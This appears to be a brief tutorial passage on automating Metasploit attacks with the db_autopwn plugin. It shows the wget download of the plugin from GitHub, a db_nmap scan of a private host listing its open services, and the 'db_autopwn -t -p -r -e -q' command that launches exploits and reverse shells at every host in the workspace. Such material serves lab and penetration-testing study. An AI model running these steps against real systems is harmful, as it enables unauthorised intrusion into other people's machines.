First we need to download the plugin called Autopwn from Github. It’s deprecated but still works, for most of the time :))) There are other ways to automate things. (refer: https://www.rapid7.com/blog/post/2011/12/08/six-ways-to-automate-metasploit/ )
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
Then copy the plugin to the Metasploit-framework.
cp db_autopwn.rb /usr/share/metasploit-framework/plugins
Then load the plugin within the Metasploit-framwork
load db_autopwn
[*] Successfully loaded plugin: db_autopwn
Create a new workspace and import/create you targets. Otherwise autopwn will use all the hosts/targets within you (default) workspace.
Here we create a new workspace with the name Local01:
workspace -a Local01
[*] Added workspace: Local01
[*] Workspace: Local01
Then use db_nmap with you own specifications to fill this workspace/database.
db_nmap -Pn 192.168.1.9
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-19 14:46 EDT
[*] Nmap: Nmap scan report for 192.168.1.9
[*] Nmap: Host is up (0.0020s latency).
[*] Nmap: Not shown: 988 closed tcp ports (conn-refused)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 22/tcp open ssh
[*] Nmap: 23/tcp open telnet
[*] Nmap: 25/tcp open smtp
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 3306/tcp open mysql
[*] Nmap: 5432/tcp open postgresql
[*] Nmap: 8009/tcp open ajp13
[*] Nmap: 8180/tcp open unknown
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
You can view the hosts by typing: hosts and the services by typing: services 🙂
To run autopwn use the following command:
db_autopwn -t -p -r -e -q
Then wait for a while and review the ouput
